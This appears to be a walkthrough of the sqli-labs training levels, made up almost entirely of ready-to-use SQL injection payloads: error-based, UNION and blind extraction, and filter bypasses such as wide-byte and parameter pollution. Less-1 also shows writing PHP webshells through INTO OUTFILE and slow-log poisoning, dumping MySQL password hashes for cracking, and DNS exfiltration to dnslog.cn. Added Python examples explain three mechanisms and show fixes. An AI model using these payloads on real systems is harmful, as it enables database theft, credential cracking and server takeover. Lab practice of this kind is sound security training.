- Environment
- Less-1 (exploitation)
- Less-2
- Less-3
- Less-4
- Less-5
- Less-6
- Less-7
- Less-8
- Less-9
- Less-10
- Less-11
- Less-12
- Less-13
- Less-14
- Less-15
- Less-16
- Less-17
- Less-18
- Less-19
- Less-20
- Less-21
- Less-22
- Less-23
- Less-24
- Less-25
- Less-25a
- Less-26
- Less-26a
- Less-27
- Less-27a
- Less-28
- Less-28a
- Less-29
- Less-30
- Less-31
- Less-32
- Less-33
- Less-34
- Less-35
- Less-36
- Less-37
- Less-38
- Less-39
- Less-40
- Less-41
- Less-42
- Less-43
- Less-44
- Less-45
- Less-46
- Less-47
- Less-48
- Less-49
- Less-50
- Less-51
- Less-52
- Less-53
- Less-54
- Less-55
- Less-56
- Less-57
- Less-58
- Less-59
- Less-60
- Less-61
- Less-62
- Less-63
- Less-64
- Less-65
Environment
*****************
*mysql 5.7.26 *
*php 5.5.9nts*
*apache 2.4.39 *
*****************
Less-1 (exploitation)
Extracting database contents with error-based injection
gtid_subset error (MySQL 5.6+; the error message "Malformed GTID set specification" echoes the malformed argument, which is where the data comes out)
1' and gtid_subset(user(),1) %23
1' and gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),1)%23
1' and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) %23
1' and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) %23
1' and gtid_subset(concat(0x7e,(select group_concat(concat(username,':',password)) from security.users)),1) %23
floor()/rand() duplicate-key error (needs a table with at least three rows to group over, which information_schema.tables always has)
-1' union select 1,2,count(*) from information_schema.tables group by concat(floor(rand(0)*2) ,0x7e,user())%23
updatexml error (XPath error output is truncated to 32 characters; page through longer values with substr())
' or updatexml(1,concat(0x7e,database()),1)%23
extractvalue error (same 32-character limit)
' or extractvalue(1,concat(0x7e,database()))%23
Extracting database contents with UNION-based injection
-1' union select 1,2,3 %23
-1' union select 1,2,group_concat(schema_name) from information_schema.schemata %23
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' %23
-1' union select 1,2,group_concat(concat(username,':',password)) from security.users %23
Out-of-band (DNS) exfiltration
Note: replace yourid with the subdomain issued by dnslog.cn and read the results on that page; if nothing arrives, request a new id or retry a few times. This only works when MySQL runs on Windows, because the UNC path given to load_file() makes the server resolve the hostname (and secure_file_priv must not block it).
-1' union select 1,2,load_file(concat('////',(select schema_name from information_schema.schemata limit 0,1),'.yourid.dnslog.cn/abc')) %23
-1' or if((select load_file(concat('////',(select schema_name from information_schema.schemata limit 4,1),'.yourid.dnslog.cn/abc'))),1,0) %23
Locate the data directory; under phpstudy this reveals the install root, from which the WWW root can be derived
' union select 1,2,@@datadir %23
Database version
-1' union select 1,2,version() %23
Hostname of the database server
-1' union select 1,2,@@hostname %23
Current database user
-1' union select 1,2,user() %23
All database users (reading mysql.user requires the corresponding privilege)
-1' union select 1,2,group_concat(concat(user,'@',host)) from mysql.user %23
Password hashes of the database users (MySQL 5.7 keeps them in authentication_string; crack them offline, e.g. with cmd5)
-1' union SELECT 1,2,group_concat(concat(user,'-',authentication_string)) FROM mysql.user %23
All privileges of the users
-1' union SELECT 1,2,group_concat(concat(grantee,'-',privilege_type)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES %23
Check whether the current user has the FILE privilege (Y = yes, N = no; replace 'root' with the current user; if several rows match the user, narrow by host, otherwise the subquery returns more than one row and errors out differently)
' or updatexml(1,concat('~file_priv:',(SELECT file_priv FROM mysql.user WHERE user='root' )),1)%23
Check whether MySQL allows file read/write (empty string = any path, NULL = disabled, a directory = restricted to that directory)
-1' union select 1,2,@@secure_file_priv %23
Read a file (needs the FILE privilege and a path the MySQL process can read)
-1' union select 1,2,load_file('e:/url.txt') %23
Export data (write to a file; INTO OUTFILE writes rows with field and line terminators, INTO DUMPFILE writes a single row raw, which is what binary content needs)
-1' union select 1,2,user() into outfile 'e:/demo.txt' %23
-1' union select 1,2,user() into dumpfile 'e:/demo1.txt' %23
Write a one-line PHP webshell into the target's web root
-1' union select 1,2,"<?php eval($_REQUEST['pass'])?>" into outfile 'F:/phpstudy_pro/WWW/muma.php' %23
(the terminator must be double-quoted: a single-quoted literal is cut off by the quotes around pass)
1' into outfile 'F:/phpstudy_pro/WWW/muma1.php' lines terminated by "<?php eval($_REQUEST['pass'])?>" %23
1' into outfile 'F:/phpstudy_pro/WWW/muma2.php' lines starting by "<?php eval($_REQUEST['pass'])?>"%23
1' into outfile 'F:/phpstudy_pro/WWW/muma3.php' fields terminated by "<?php eval($_REQUEST['pass'])?>"%23
1' into outfile 'F:/phpstudy_pro/WWW/muma4.php' COLUMNS terminated by "<?php eval($_REQUEST['pass'])?>"%23
Hex-encode the webshell: MySQL accepts a 0x... literal as a string, so no quotes are needed at all (useful when quotes are escaped)
1' into outfile 'F:/phpstudy_pro/WWW/muma5.php' lines terminated by 0x3c3f706870206576616c28245f524551554553545b2770617373275d293f3e %23
Check whether the slow query log is enabled (1 = on, 0 = off)
-1' union select 1,2,@@slow_query_log %23
The slow query log is enabled by adding slow_query_log = ON under [mysqld] in my.ini
If it is enabled, find the log path (e.g. F:\phpstudy_pro\Extensions\MySQL5.7.26\data\DESKTOP-SRG99HI-slow.log)
-1' union select 1,2,@@slow_query_log_file %23
By default the slow log records statements that run longer than long_query_time (10 seconds), so craft a statement that sleeps for 10 seconds and carries the webshell in its text
-1' union select 1,sleep(10),"<?php eval($_REQUEST['pass'])?>" %23
Then copy the log into the WWW root (load_file on the log path, written out with INTO OUTFILE) so a webshell client can connect to it
-1' union select 1,2,load_file('F:/phpstudy_pro/Extensions/MySQL5.7.26/data/DESKTOP-SRG99HI-slow.log') into outfile "F:/phpstudy_pro/WWW/muma6.php" %23
Less-2
1 or gtid_subset(user(),1)
1 and gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),1)
Less-3
1') or gtid_subset(user(),1)%23
1') and gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),1)%23
Less-4
1") or gtid_subset(user(),1)%23
Less-5
1' or gtid_subset(user(),1)%23
Less-6
1" or gtid_subset(user(),1)%23
Less-7
-1')) union select 1,2,user() into outfile 'e:/demo.txt' %23
Less-8
' or ascii(substr(database(),1,1))>97 %23
' or ascii(substr(database(),1,1))=115 %23
Less-9
' or if(ascii(substr(database(),1,1))=114,sleep(2),1) %23
' or if(ascii(substr(database(),1,1))=115,sleep(2),1) %23
Less-10
" or if(ascii(substr(database(),1,1))=114,sleep(2),1) %23
" or if(ascii(substr(database(),1,1))=115,sleep(2),1) %23
Less-11
For Less-11 to Less-17 the injection point is the POST body: intercept the request with Burp Suite and edit the body
uname=1' or gtid_subset(user(),1)%23&passwd=12&submit=Submit
Less-12
uname=1") or gtid_subset(user(),1)%23&passwd=12&submit=Submit
Less-13
uname=1') or gtid_subset(user(),1)%23&passwd=12&submit=Submit
Less-14
uname=1" or gtid_subset(user(),1)%23&passwd=12&submit=Submit
Less-15
uname=' or ascii(substr(database(),1,1))=114 %23&passwd=12&submit=Submit
uname=' or ascii(substr(database(),1,1))=115 %23&passwd=12&submit=Submit
Less-16
uname=") or if(ascii(substr(database(),1,1))=114,sleep(2),1)%23&passwd=12&submit=Submit
uname=") or if(ascii(substr(database(),1,1))=115,sleep(2),1)%23&passwd=12&submit=Submit
Less-17
(uname must be an existing user: the level looks the username up first and only then runs the UPDATE that contains the password)
uname=admin&passwd=1' and gtid_subset(user(),1)%23&submit=Submit
Less-18
User-Agent injection
The credentials must be correct, because the User-Agent is only inserted into the database after a successful login; intercept the request and edit the UA header
User-Agent: ' or gtid_subset(user(),1) or '
Less-19
Referer injection
The credentials must be correct; intercept the request and edit the Referer header
Referer: ' or gtid_subset(user(),1) or '
Less-20
Cookie injection
The credentials must be correct; intercept the second request (the one carrying the uname cookie) and edit the cookie
Cookie: uname=' or gtid_subset(user(),1)%23
Less-21
Cookie injection
The credentials must be correct; intercept the second request and edit the cookie, whose value is base64-encoded here
Before encoding: ') or gtid_subset(user(),1)#   After encoding: Jykgb3IgZ3RpZF9zdWJzZXQodXNlcigpLDEpIw==
Cookie: uname=Jykgb3IgZ3RpZF9zdWJzZXQodXNlcigpLDEpIw==
Less-22
Cookie injection
The credentials must be correct; intercept the second request and edit the cookie, whose value is base64-encoded here
Before encoding: " or gtid_subset(user(),1)#   After encoding: IiBvciBndGlkX3N1YnNldCh1c2VyKCksMSkj
Cookie: uname=IiBvciBndGlkX3N1YnNldCh1c2VyKCksMSkj
Less-23
Filters # and --
Bypass: instead of commenting out the trailing quote, absorb it with a trailing or '
' or gtid_subset(user(),1) or '
' union select 1,user(),3 or '
' union select 1,user(),3 '
Less-24
Second-order injection
1. Register a user test with password asd
2. Pretend that user test has forgotten the password
3. Register a user test'# with password 123
4. Log in as test'# and change the password to admin
5. The database executes UPDATE users SET PASSWORD='admin' where username='test'#' and password='123'
6. So instead of changing the password of test'#, the password of test is changed (the registration form escapes the username, but the password-change form trusts the username from the session and concatenates it unescaped)
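The six steps above, replayed offline as an added example that is not the sqli-labs source. It uses an in-memory SQLite stand-in for the users table; because SQLite does not understand MySQL's # comment, the crafted account is test'-- instead of test'# (the mechanism is identical). escape() stands in for mysql_real_escape_string, and change_password_fixed() shows the same update with every value bound.

```python
import sqlite3

# Constructed stand-in for Less-24 (not the sqli-labs source): SQLite in memory,
# attacker account test'-- because SQLite has no MySQL-style # comment.


def escape(value):
    """Stand-in for mysql_real_escape_string: neutralise the quote character."""
    return value.replace("'", "''")


def setup():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(username TEXT, password TEXT)")
    return conn


def register(conn, username, password):
    # Registration escapes its input, so test'-- is stored literally and safely.
    conn.execute(f"INSERT INTO users VALUES ('{escape(username)}', '{escape(password)}')")


def login(conn, username, password):
    # Login is parameterised; it returns the username that goes into the session.
    row = conn.execute("SELECT username FROM users WHERE username=? AND password=?",
                       (username, password)).fetchone()
    return row[0] if row else None


def change_password_vulnerable(conn, session_user, old_pw, new_pw):
    # Less-24 bug: the username comes from the session ("it is already in the DB,
    # so it must be safe") and is concatenated without escaping.
    sql = (f"UPDATE users SET password='{escape(new_pw)}' "
           f"WHERE username='{session_user}' AND password='{escape(old_pw)}'")
    conn.execute(sql)
    return sql


def change_password_fixed(conn, session_user, old_pw, new_pw):
    # Every value is bound, whatever its origin.
    conn.execute("UPDATE users SET password=? WHERE username=? AND password=?",
                 (new_pw, session_user, old_pw))


def get_password(conn, username):
    row = conn.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0] if row else None


def run_attack(fixed=False):
    """Replays the page's steps; returns (victim's password, attacker's password)."""
    conn = setup()
    register(conn, "test", "asd")                   # step 1: victim account
    attacker = "test'-- "
    register(conn, attacker, "123")                 # step 3: crafted account
    session_user = login(conn, attacker, "123")     # step 4: log in as test'--
    if fixed:
        change_password_fixed(conn, session_user, "123", "admin")
    else:
        change_password_vulnerable(conn, session_user, "123", "admin")   # step 5
    return get_password(conn, "test"), get_password(conn, attacker)


if __name__ == "__main__":
    print(run_attack())             # victim's password becomes admin
    print(run_attack(fixed=True))   # only the attacker's own password changes
```

The point of the stand-in is the order of operations: the quote in test'-- is harmless when it is inserted, and dangerous only when the stored value is read back and trusted.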
Less-25
Filters and, or (one case-insensitive stripping pass; note it also eats the or/and inside identifiers such as information_schema and password, which then need the same doubling)
Bypass: double-write so that one stripping pass leaves the keyword behind, or use the symbol forms && (%26%26) and || (%7c%7c)
' oorr gtid_subset(user(),1)%23
' aandnd gtid_subset(user(),1)%23
' %26%26 gtid_subset(user(),1)%23
' %7c%7c gtid_subset(user(),1)%23
Less-25a
Filters and, or
Bypass
-1 oorr ascii(substr(database(),1,1))=114
-1 oorr ascii(substr(database(),1,1))=115
Less-26
Filters and, or, #, --, /*, whitespace (\s) and backslash
Bypass: || and && replace or/and, and no whitespace is needed between the quote and the function call
'||gtid_subset(user(),1)||'
'%26%26gtid_subset(database(),1)%26%26'
Less-26a
Filters and, or, #, --, /*, whitespace (\s) and backslash
Bypass
'||ascii(substr(database(),1,1))=114||'
'||ascii(substr(database(),1,1))=115||'
Less-27
Filters union, select, and, or, #, --, /* and the space character
Bypass: mixed case evades the fixed spellings the filter strips, and %0a (newline) replaces the space
'%0aUnIoN%0aSeLeCT%0a1,user(),3||'
'||gtid_subset(concat(0x7e,(SeLeCT%0agroup_concat(schema_name)%0afrom%0ainformation_schema.schemata)),1)||'
Less-27a
Filters union, select, and, or, #, --, /* and the space character
Bypass
"%0aUnIoN%0aSeLeCT%0a1,user(),3||"
Less-28
Filters union followed by select (one case-insensitive pass), plus #, --, /* and spaces
Bypass: double-write so that removing "union select" once leaves another "union select"; %0a stands in for the space
')%0auunion%0aselectnion%0aselect%0a1,user(),3||('
Less-28a
Filters union select only
Bypass
')%0auunion%0aselectnion%0aselect%0a1,user(),3||('
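Why double-writing works against Less-25 and Less-28: both levels strip a pattern once and then use what is left. The following re-implementation of those two blacklists, as the page describes them, is an added example and not the sqli-labs source; %0a is written as "\n". validate_id() shows the positive check that should replace a blacklist for a numeric id.

```python
import re

# Added example (not the sqli-labs source): strip-once blacklists modelled on the
# page's description of Less-25 (and/or) and Less-28 (union select).


def less25_style_filter(s: str) -> str:
    """Remove 'or' and 'and' (case-insensitive), one pass each."""
    s = re.sub(r"or", "", s, flags=re.I)
    s = re.sub(r"and", "", s, flags=re.I)
    return s


def less28_style_filter(s: str) -> str:
    """Strip /*, -, #, space and plus, then one pass of union<whitespace>select."""
    s = re.sub(r"[/*]", "", s)
    s = re.sub(r"-", "", s)
    s = re.sub(r"#", "", s)
    s = re.sub(r"[ +]", "", s)
    s = re.sub(r"union\s+select", "", s, flags=re.I)   # \s matches the %0a newline too
    return s


def strip_until_stable(s: str, filt) -> str:
    """Re-applying the filter until nothing changes closes the double-write hole,
    but the filter still mangles legitimate text that contains the letters."""
    while True:
        out = filt(s)
        if out == s:
            return out
        s = out


def validate_id(s: str):
    """Positive validation for a numeric id: int on success, None otherwise.
    Paired with a parameterised query this makes the blacklist unnecessary."""
    return int(s) if re.fullmatch(r"-?\d+", s) else None


if __name__ == "__main__":
    print(less25_style_filter("' oorr gtid_subset(user(),1)#"))      # ' or gtid_subset(user(),1)#
    print(less25_style_filter("information_schema"))                 # infmation_schema
    print(repr(less28_style_filter("')\nuunion\nselectnion\nselect\n1,user(),3||('")))
    print(validate_id("1"), validate_id("-1' union select 1,2,3"))   # 1 None
```

The second print shows the collateral damage that forces the doubled spellings inside identifiers; the third shows that the page's Less-28 payload survives one pass as a clean union select.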
Less-29
Whitelist bypass
The level is at login.php, not index.php
HTTP parameter pollution: the front-end check validates only the first id value, while PHP's $_GET['id'] takes the last one, which is never validated
http://192.168.31.242/sqli-labs/Less-29/login.php?id=1&id=-1' union select 1,2,database() --+
Less-30
Whitelist bypass
The level is at login.php, not index.php
HTTP parameter pollution
The front-end check validates only the first id value, while PHP's $_GET['id'] takes the last one, which is never validated
http://192.168.31.242/sqli-labs/Less-30/login.php?id=1&id=-1" union select 1,2,database() --+
Less-31
Whitelist bypass
The level is at login.php, not index.php
HTTP parameter pollution
The front-end check validates only the first id value, while PHP's $_GET['id'] takes the last one, which is never validated
http://192.168.31.242/sqli-labs/Less-31/login.php?id=1&id=-1") union select 1,2,database() --+
Less-32
Wide-byte bypass of the escaping: the escaping inserts a backslash (0x5c) before the quote, and under a GBK connection 0xdf 0x5c is read as one double-byte character, so the quote is free again
-1%df' union select 1,2,group_concat(schema_name) from information_schema.schemata%23
-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x70696b61636875 %23
0x70696b61636875 is 'pikachu' in hex (the pikachu database exists in this environment; substitute the target's own schema name otherwise)
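The mechanism behind %df, as an added example that is not part of the page: escaping is applied byte by byte, but the SQL parser reads the bytes in the connection charset. addslashes() below is a PHP-style byte-wise escaper written for this demonstration, parser_sees_bytewise() is the vulnerable order of operations, and parser_sees_charset_aware() is the order that a charset-aware escaper (mysql_set_charset plus mysql_real_escape_string, or simply a prepared statement) gives you.

```python
# Added example of the wide-byte mechanism (not from the page).


def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping in the style of PHP addslashes(): backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out += b"\\"
        out.append(b)
    return bytes(out)


def parser_sees_bytewise(param: bytes, charset: str) -> str:
    """Vulnerable order: escape the raw bytes, then let the server decode them."""
    return addslashes(param).decode(charset, errors="replace")


def parser_sees_charset_aware(param: bytes, charset: str) -> str:
    """Safe order: decode first (an orphan 0xdf cannot grab the backslash), then escape."""
    text = param.decode(charset, errors="replace")
    return text.replace("\\", "\\\\").replace("'", "\\'")


def has_unescaped_quote(s: str) -> bool:
    """True if some single quote is not preceded by a backslash, i.e. it can close the SQL literal."""
    return any(c == "'" and (i == 0 or s[i - 1] != "\\") for i, c in enumerate(s))


if __name__ == "__main__":
    payload = b"\xdf'"        # what %df' looks like after URL decoding
    for cs in ("gbk", "utf-8"):
        seen = parser_sees_bytewise(payload, cs)
        print(cs, repr(seen), "quote free:", has_unescaped_quote(seen))
    # gbk: the 0xdf 0x5c pair became one character and the quote is free
    # utf-8: 0xdf is an invalid lead byte on its own, the backslash survives, quote stays escaped
    print("charset-aware:", has_unescaped_quote(parser_sees_charset_aware(payload, "gbk")))
```

Under utf-8 the same bytes are harmless, which is why the attack depends on the server having been told the connection is GBK (the SET NAMES gbk of these levels) while the escaping still works on bytes.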
Less-33
Wide-byte bypass of the escaping
-1%df' union select 1,2,group_concat(schema_name) from information_schema.schemata%23
-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x70696b61636875 %23
Less-34
Wide-byte bypass of the escaping
Intercept the POST body with Burp Suite and edit it
uname=12&passwd=12%df' or gtid_subset(user(),1) %23&submit=Submit
Less-35
Same family of levels, but the id is numeric here, so no quote (and therefore no %df) is needed
1 and gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),1)
List the tables in pikachu
1 and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x70696b61636875)),1)
Less-36
Wide-byte bypass of the escaping
-1%df' union select 1,2,group_concat(schema_name) from information_schema.schemata%23
Less-37
Wide-byte bypass of the escaping
Intercept the POST body with Burp Suite and edit it (the login query selects two columns)
uname=-1%df' union select 2,group_concat(schema_name) from information_schema.schemata%23&passwd=12&submit=Submit
Less-38
Stacked queries; first learn the database, table and column names with UNION injection
1';create database abc;
-1';insert into users values(17,'test2','0');
-1';delete from users where username='test2';
-1';update users set password='123' where username='Dumb';
Less-39
Stacked queries
-1;insert into users values(18,'test3','0');
Less-40
Stacked queries
-1');insert into users values(19,'test4','0');
Less-41
Stacked queries
1;insert into users values(20,'test5','0');
Less-42
Stacked queries
Intercept the POST body with Burp Suite and edit it
login_user=11&login_password=-1';insert into users values(21,'test5','0');&mysubmit=Login
(this creates a user test5 with password 0)
Less-43
Stacked queries are not needed here; error-based injection works
Intercept the POST body with Burp Suite and edit it
login_user=11&login_password=1') or gtid_subset(user(),1) %23&mysubmit=Login
Less-44
Stacked queries
Intercept the POST body with Burp Suite and edit it
login_user=11&login_password=1';insert into users values(22,'test6','0');&mysubmit=Login
Less-45
Stacked queries
Intercept the POST body with Burp Suite and edit it
login_user=11&login_password=1');insert into users values(23,'test6','0');&mysubmit=Login
Less-46
ORDER BY injection (the parameter lands after ORDER BY, so UNION is not available; use error-based, time-based or INTO OUTFILE)
Error-based
updatexml(1,concat(0x7e,user()),1)
extractvalue(1,concat(0x7e,database()))
Time-based blind (note the branches: here the delay fires when the guess is wrong)
1 and if(ascii(substr(database(),1,1))=115,0,sleep(2))
1 and if(ascii(substr(database(),1,1))=116,0,sleep(2))
Write a one-line webshell (hex-encoded; this one is the $_POST variant)
1 INTO OUTFILE 'e:/m.php' LINES TERMINATED BY 0x3c3f706870206576616c28245f504f53545b2770617373275d293f3e
Less-47
ORDER BY injection
1' and updatexml(1,concat(0x7e,user()),1)%23
1' and extractvalue(1,concat(0x7e,database()))%23
Write a webshell
1' INTO OUTFILE 'e:/m.php' LINES TERMINATED BY 0x3c3f706870206576616c28245f504f53545b2770617373275d293f3e %23
Less-48
ORDER BY injection
Time-based blind
1 and if(ascii(substr(database(),1,1))=115,0,sleep(2))
1 and if(ascii(substr(database(),1,1))=116,0,sleep(2))
Less-49
ORDER BY injection
Time-based blind
1' and if(ascii(substr(database(),1,1))=115,0,sleep(2))%23
1' and if(ascii(substr(database(),1,1))=116,0,sleep(2))%23
Less-50
ORDER BY injection
Error-based
updatexml(1,concat(0x7e,user()),1)
extractvalue(1,concat(0x7e,database()))
Stacked queries also work here; see Less-38
Less-51
ORDER BY injection
1' and updatexml(1,concat(0x7e,user()),1)%23
1' and extractvalue(1,concat(0x7e,database()))%23
Stacked queries also work here; see Less-38
Less-52
ORDER BY injection
Time-based blind
1 and if(ascii(substr(database(),1,1))=115,0,sleep(2))
1 and if(ascii(substr(database(),1,1))=116,0,sleep(2))
Stacked queries also work here; see Less-38
Less-53
ORDER BY injection
Time-based blind
1' and if(ascii(substr(database(),1,1))=115,0,sleep(2))%23
1' and if(ascii(substr(database(),1,1))=116,0,sleep(2))%23
Stacked queries also work here; see Less-38
Less-54
The objective of this challenge is to dump the secret key from a random table of the challenges database in fewer than 10 tries (every request counts). For fun, each reset generates a random table name, random column names and random data, so it stays fresh; the values shown in [] below are placeholders that change on every reset
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' %23
Table name found: nvw9mo2tqp
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='[nvw9mo2tqp]' %23
Columns found: id, sessid, secret_CJZ0, tryy
-1' union select 1,2,group_concat(concat(sessid,':',[secret_CJZ0])) from challenges.[nvw9mo2tqp] %23
Submit the value after the colon to pass the level
Less-55
First click Reset the Challenge! to reset the database, then proceed as in Less-54
-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' %23
Table name found: wchcrmmhzw
-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='wchcrmmhzw' %23
Columns found: id, sessid, secret_CDNC, tryy
-1) union select 1,2,group_concat(concat(sessid,':',secret_CDNC)) from challenges.wchcrmmhzw %23
Submit the value after the colon to pass the level
Less-56
First click Reset the Challenge! to reset the database, then proceed as in Less-54
-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' %23
Table name found: u4w32ptczx
-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='u4w32ptczx' %23
Columns found: id, sessid, secret_SADN, tryy
-1') union select 1,2,group_concat(concat(sessid,':',secret_SADN)) from challenges.u4w32ptczx %23
Submit the value after the colon to pass the level
Less-57
First click Reset the Challenge! to reset the database, then proceed as in Less-54
-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' %23
Table name found: kktpgr0pk2
-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='kktpgr0pk2' %23
Columns found: id, sessid, secret_533C, tryy
-1" union select 1,2,group_concat(concat(sessid,':',secret_533C)) from challenges.kktpgr0pk2 %23
Submit the value after the colon to pass the level
Less-58
First click Reset the Challenge! to reset the database; this level needs error-based injection
1' and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) %23
Table name found: ub4yi19a96
1' and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='ub4yi19a96')),1) %23
Columns found: id, sessid, secret_I3Z9, tryy
1' and gtid_subset(concat(0x7e,(select group_concat(concat(sessid,':',secret_I3Z9)) from challenges.ub4yi19a96)),1) %23
Submit the value after the colon to pass the level
Less-59
First click Reset the Challenge! to reset the database; this level needs error-based injection
1 and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)
Table name found: 6dwnu523h0
1 and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='6dwnu523h0')),1)
Columns found: id, sessid, secret_R6HL, tryy
1 and gtid_subset(concat(0x7e,(select group_concat(concat(sessid,':',secret_R6HL)) from challenges.6dwnu523h0)),1)
Submit the value after the colon to pass the level
Less-60
First click Reset the Challenge! to reset the database; this level needs error-based injection
1") and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) %23
Table name found: 8zl4ya4h4y
1") and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='8zl4ya4h4y')),1) %23
Columns found: id, sessid, secret_XWZV, tryy
1") and gtid_subset(concat(0x7e,(select group_concat(concat(sessid,':',secret_XWZV)) from challenges.8zl4ya4h4y)),1)%23
Submit the value after the colon to pass the level
Less-61
First click Reset the Challenge! to reset the database; this level needs error-based injection
1')) and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) %23
Table name found: vt3n10iqbm
1')) and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='vt3n10iqbm')),1) %23
Columns found: id, sessid, secret_JX4B, tryy
1')) and gtid_subset(concat(0x7e,(select group_concat(concat(sessid,':',secret_JX4B)) from challenges.vt3n10iqbm)),1)%23
Submit the value after the colon to pass the level
Less-62
First click Reset the Challenge! to reset the database; this level needs boolean-based blind injection (the ascii() comparisons below narrow each character down a range at a time)
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>110 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>103 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>100 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=102 %23
So the first letter of the table name is f
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),2,1))>97 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),2,1))>110 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),2,1))>103 %23
Probe the second letter of the table name the same way, and so on
Once the table name is known, guess the columns
') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="challenges" and table_name="{}" ),1,1))>97%23
') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="challenges" and table_name="{}" ),1,1))>110%23
Once the columns are known, guess the records
') or ascii(substr((select group_concat(col)from challenges.tb_name),1,1))>97%23
…
Because this is so tedious, I wrote a script for it:
https://blog.csdn.net/weixin_43623271/article/details/122801470
Less-63
First click Reset the Challenge! to reset the database; this level needs boolean-based blind injection
Same as Less-62; only the way the payload closes the query differs
' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>110 %23
' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>103 %23
' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=103 %23
Run the script
https://blog.csdn.net/weixin_43623271/article/details/122801470
Less-64
First click Reset the Challenge! to reset the database; this level needs boolean-based blind injection
Same as Less-62; only the way the payload closes the query differs
1)) and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
Run the script
https://blog.csdn.net/weixin_43623271/article/details/122801470
Less-65
First click Reset the Challenge! to reset the database; this level needs boolean-based blind injection
Same as Less-62; only the way the payload closes the query differs
1") and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
Run the script
https://blog.csdn.net/weixin_43623271/article/details/122801470